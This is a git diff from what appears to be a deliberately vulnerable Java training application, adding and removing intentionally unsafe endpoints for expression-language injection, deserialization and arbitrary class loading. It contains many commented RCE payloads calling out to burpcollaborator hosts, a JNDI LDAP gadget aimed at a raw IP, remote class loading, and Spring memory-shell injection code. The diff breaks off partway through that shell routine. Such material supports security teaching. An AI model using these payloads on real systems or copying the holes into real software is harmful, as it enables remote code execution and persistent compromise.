() {
- @Override
- public void onMessage(ByteBuffer message) {
- try {
- message.clear();
- i++;
- process(message, session);
- } catch (Exception ignored) {
- }
- }
- });
- }
-}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/ClassDataLoader.java b/src/main/java/org/joychou/controller/ClassDataLoader.java
deleted file mode 100644
index acd4ff3f..00000000
--- a/src/main/java/org/joychou/controller/ClassDataLoader.java
+++ /dev/null
@@ -1,31 +0,0 @@
-package org.joychou.controller;
-
-import org.slf4j.Logger;
-import org.slf4j.LoggerFactory;
-import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.context.request.RequestContextHolder;
-import org.springframework.web.context.request.ServletRequestAttributes;
-
-import javax.servlet.http.HttpServletRequest;
-
-public class ClassDataLoader {
-
- protected final Logger logger = LoggerFactory.getLogger(this.getClass());
-
- @RequestMapping("/classloader")
- public void classData() {
- try{
- ServletRequestAttributes sra = (ServletRequestAttributes) RequestContextHolder.getRequestAttributes();
- HttpServletRequest request = sra.getRequest();
- String classData = request.getParameter("classData");
-
- byte[] classBytes = java.util.Base64.getDecoder().decode(classData);
- java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
- defineClassMethod.setAccessible(true);
- Class cc = (Class) defineClassMethod.invoke(ClassLoader.getSystemClassLoader(), null, classBytes, 0, classBytes.length);
- cc.newInstance();
- }catch(Exception e){
- logger.error(e.toString());
- }
- }
-}
diff --git a/src/main/java/org/joychou/controller/Deserialize.java b/src/main/java/org/joychou/controller/Deserialize.java
index 55c82ab2..45662e9c 100644
--- a/src/main/java/org/joychou/controller/Deserialize.java
+++ b/src/main/java/org/joychou/controller/Deserialize.java
@@ -1,6 +1,5 @@
package org.joychou.controller;
-import com.fasterxml.jackson.databind.ObjectMapper;
import org.joychou.config.Constants;
import org.joychou.security.AntObjectInputStream;
import org.slf4j.Logger;
@@ -30,14 +29,17 @@ public class Deserialize {
protected final Logger logger = LoggerFactory.getLogger(this.getClass());
/**
- * java -jar ysoserial.jar CommonsCollections5 "open -a Calculator" | base64
- * http://localhost:8080/deserialize/rememberMe/vuln
+ * java -jar ysoserial.jar CommonsCollections5 "open -a Calculator" | base64
+ * Add the result to rememberMe cookie.
+ *
+ * http://localhost:8080/deserialize/rememberMe/vuln
*/
@RequestMapping("/rememberMe/vuln")
public String rememberMeVul(HttpServletRequest request)
throws IOException, ClassNotFoundException {
Cookie cookie = getCookie(request, Constants.REMEMBER_ME_COOKIE);
+
if (null == cookie) {
return "No rememberMe cookie. Right?";
}
@@ -54,9 +56,9 @@ public String rememberMeVul(HttpServletRequest request)
}
/**
- * Check deserialize class using black list.
- * Or update commons-collections to 3.2.2 or above.Serialization support for org.apache.commons.collections.functors.InvokerTransformer is disabled for security reasons.To enable it set system property 'org.apache.commons.collections.enableUnsafeSerialization' to 'true',but you must ensure that your application does not de-serialize objects from untrusted sources.
- * http://localhost:8080/deserialize/rememberMe/security
+ * Check deserialize class using black list.
+ *
+ * http://localhost:8080/deserialize/rememberMe/security
*/
@RequestMapping("/rememberMe/security")
public String rememberMeBlackClassCheck(HttpServletRequest request)
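Review bot: The rewritten Javadoc on rememberMeBlackClassCheck drops the only remediation guidance this file carried — the note that commons-collections 3.2.2 and above disables InvokerTransformer serialization by default — and now documents the "secure" endpoint only by the words "black list". Since this method is the one meant to demonstrate the safer pattern, a short pointer is worth keeping, e.g. `* Mitigation: upgrade commons-collections to 3.2.2+ (InvokerTransformer deserialization is disabled by default there) and prefer an allow-list of expected classes over a black list when filtering the ObjectInputStream.` The method body continues outside the hunk, so whether the filtering (presumably via the AntObjectInputStream imported at the top of the file) is allow- or deny-based cannot be confirmed from here; the comment should state which one it is.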
@@ -84,17 +86,4 @@ public String rememberMeBlackClassCheck(HttpServletRequest request)
return "I'm very OK.";
}
- // String payload = "[\"org.jsecurity.realm.jndi.JndiRealmFactory\", {\"jndiNames\":\"ldap://30.196.97.50:1389/yto8pc\"}]";
- @RequestMapping("/jackson")
- public void Jackson(String payload) {
- ObjectMapper mapper = new ObjectMapper();
- mapper.enableDefaultTyping();
- try {
- Object obj = mapper.readValue(payload, Object.class);
- mapper.writeValueAsString(obj);
- } catch (IOException e) {
- e.printStackTrace();
- }
- }
-
}
diff --git a/src/main/java/org/joychou/controller/Dotall.java b/src/main/java/org/joychou/controller/Dotall.java
deleted file mode 100644
index f6746354..00000000
--- a/src/main/java/org/joychou/controller/Dotall.java
+++ /dev/null
@@ -1,31 +0,0 @@
-package org.joychou.controller;
-
-
-
-import java.net.URLDecoder;
-import java.nio.charset.StandardCharsets;
-import java.util.regex.Pattern;
-
-
-/**
- * Spring Security CVE-2022-22978
- * 漏洞相关wiki
- * @author JoyChou @2023-01-212
- */
-
-public class Dotall {
-
-
- /**
- * 官方spring-security修复commit记录
- */
- public static void main(String[] args) throws Exception{
- Pattern vuln_pattern = Pattern.compile("/black_path.*");
- Pattern sec_pattern = Pattern.compile("/black_path.*", Pattern.DOTALL);
-
- String poc = URLDecoder.decode("/black_path%0a/xx", StandardCharsets.UTF_8.toString());
- System.out.println("Poc: " + poc);
- System.out.println("Not dotall: " + vuln_pattern.matcher(poc).matches()); // false,非dotall无法匹配\r\n
- System.out.println("Dotall: " + sec_pattern.matcher(poc).matches()); // true,dotall可以匹配\r\n
- }
-}
diff --git a/src/main/java/org/joychou/controller/EL.java b/src/main/java/org/joychou/controller/EL.java
new file mode 100644
index 00000000..8b6463a6
--- /dev/null
+++ b/src/main/java/org/joychou/controller/EL.java
@@ -0,0 +1,173 @@
+package org.joychou.controller;
+
+import org.flowable.common.engine.api.variable.VariableContainer;
+import org.flowable.engine.impl.el.ProcessExpressionManager;
+import org.springframework.expression.ExpressionParser;
+import org.springframework.expression.spel.standard.SpelExpressionParser;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+import org.springframework.web.context.WebApplicationContext;
+import org.springframework.web.servlet.handler.AbstractHandlerMapping;
+
+import javax.el.ELProcessor;
+import java.io.IOException;
+import java.lang.reflect.Field;
+import java.lang.reflect.Method;
+import java.net.URL;
+import java.net.URLClassLoader;
+import java.util.ArrayList;
+import java.util.LinkedHashSet;
+
+
+@RestController
+public class EL {
+
+ @RequestMapping("/el")
+ public String el(String expression) {
+ ExpressionParser parser = new SpelExpressionParser();
+ // fix method: SimpleEvaluationContext
+ return parser.parseExpression(expression).getValue().toString();
+ }
+
+ @RequestMapping("/juel")
+ public String juel(String expression) {
+// String payload = "${''.getClass().forName('jdk.jshell.JShell').getMethod('create').invoke(null).eval('java.lang.Runtime.getRuntime().exec(\"notepad\")')}";
+
+
+ Object result = new ProcessExpressionManager().createExpression(expression).getValue(new VariableContainer() {
+ @Override
+ public boolean hasVariable(String s) {
+ return false;
+ }
+
+ @Override
+ public Object getVariable(String s) {
+ return null;
+ }
+
+ @Override
+ public void setVariable(String s, Object o) {
+
+ }
+
+ @Override
+ public void setTransientVariable(String s, Object o) {
+
+ }
+
+ @Override
+ public String getTenantId() {
+ return null;
+ }
+ });
+
+ return result.toString();
+ }
+
+ public static void main(String[] args) throws IOException, ClassNotFoundException {
+// String payload = "''.getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"java.lang.Runtime.getRuntime().exec('ping 1uwnjnqpo6cyg9g825afrsvunltphe.burpcollaborator.net')\")";
+// String payload = "''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('calc.exe')";
+// String payload = "''.getClass().forName('java.net.InetAddress').getMethod('getByName',''.getClass()).invoke('','ylnkakhmf33v7675t21cipmreikl8a.burpcollaborator.net')";
+// String payload = "\"\".getClass().forName(\"java.lang.ProcessBuilder\").getDeclaredConstructors()[0].newInstance([\"ping\",\"p0qbpbwduuimmxmw8tg3xg1it9zen3.burpcollaborator.net\"]).start()";
+ String payload = "${\"\".getClass().forName(\"java.net.InetAddress\").getMethod(\"getByName\",\"\".getClass()).invoke(\"\",\"if1444b69nxf1q1pnmvwc9gb82e12q.burpcollaborator.net\")}\n";
+// String payload = "\"\".getClass().forName(\"java.net.InetSocketAddress\").getDeclaredConstructors()[2].newInstance([\"uqoimkc58pr8g1oe5i7ai71lyc4bs0.burpcollaborator.net\",80])";
+// String payload = "\"\".getClass().forName(\"java.net.Socket\").getDeclaredConstructors()[9].newInstance(\"uqoimkc58pr8g1oe5i7ai71lyc4bs0.burpcollaborator.net\",Integer.valueOf(80))";
+// String payload = "\"\".getClass().forName(\"org.yaml.snakeyaml.Yaml\").getDeclaredConstructors()[6].newInstance().load(\"!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ['http://ej12f45p19ks9lhyy20ubru5rwxwll.burpcollaborator.net/Yaml']]]]\")";
+// String payload = "\"\".getClass().forName(\"java.lang.ProcessBuilder\").getDeclaredConstructors()[0].newInstance([\"ping\",\"t3xhzjp4lo47t01dihk9v6ekbbhc51.burpcollaborator.net\"]).start()";
+// String payload = "''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"java.lang.Runtime.getRuntime().exec('ping s0tgwim3in16qzycfgh8s5bj8aee23.burpcollaborator.net')\")";
+// String payload = "''.getClass().forName('java.net.URL').getDeclaredConstructors()[2].newInstance('http://kl98ha7v3fmybrj40820dxwbt2ztvhk.burpcollaborator.net/URL').openStream()";
+// String payload = "''.getClass().forName('jdk.jshell.JShell').getMethod('create').invoke(null).eval('java.lang.Runtime.getRuntime().exec(\"calc\")')";
+
+// String payload = "''.getClass().forName('jdk.jshell.JShell').getMethod('create').invoke(null).eval('new java.lang.ProcessBuilder().command(\"cmd /c calc\".split(\" \")).start()')";
+
+ // 调用loadClass之前不会发出http请求,调用之后才发出。
+// new URLClassLoader(new URL[]{new URL("http://bp4zl1bm76qpfinv4z6rho02xt3kw8l.burpcollaborator.net")}, "".getClass().getClassLoader()).loadClass("EvilBB01");
+
+// String[] payloads = new String[]{
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[0].toString()",
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[1].toString()",
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[2].toString()",
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[3].toString()",
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[4].toString()",
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[5].toString()",
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[6].toString()",
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[7].toString()",
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[8].toString()",
+// "''.getClass().forName('java.net.URL').getDeclaredConstructors()[9].toString()",
+// };
+ ELProcessor processor = new ELProcessor();
+//
+//// String payload = "''.getClass().forName('org.yaml.snakeyaml.Yaml').getDeclaredConstructors()[0].toString()";
+// for (int i = 0; i < payloads.length; i++) {
+// System.out.println(processor.eval(payloads[i]).toString());
+// }
+
+// System.out.println(processor.eval(payload).toString());
+
+// (new java.io.FileOutputStream("/home/cqq/result.txt")).write((new java.lang.ProcessBuilder("ls","-al").start().getInputStream().readAllBytes()));
+// new java.lang.ProcessBuilder("cmd","/c","calc").start();
+// List eval = JShell.create().eval();
+// Process process = (Process) processor.eval(payload);
+// InputStream inputStream = process.getInputStream();
+// StringBuilder stringBuilder2 = new StringBuilder();
+// BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
+// String line;
+// while((line = bufferedReader.readLine()) != null) {
+// stringBuilder2.append(line).append("\n");
+// }
+//
+// String result = stringBuilder2.toString();
+// System.out.println(result);
+
+// ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
+ java.net.URL url = new URL("http://localhost:8080/com/SpringMemShell.class");
+ URLClassLoader classLoader = new URLClassLoader(new URL[]{url});
+ classLoader.loadClass("com.SpringMemShell");
+ }
+
+ static void injectMemShell(){
+
+ try{
+ // 1. 反射 org.springframework.context.support.LiveBeansView 类 applicationContexts 属性
+ Field field = Class.forName("org.springframework.context.support.LiveBeansView").getDeclaredField("applicationContexts");
+ // 2. 属性被 private 修饰,所以 setAccessible true
+ field.setAccessible(true);
+ // 3. 获取一个 ApplicationContext 实例
+ WebApplicationContext context =(WebApplicationContext) ((LinkedHashSet)field.get(null)).iterator().next();
+
+ AbstractHandlerMapping abstractHandlerMapping = (AbstractHandlerMapping)context.getBean("requestMappingHandlerMapping");
+ field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
+ field.setAccessible(true);
+ ArrayList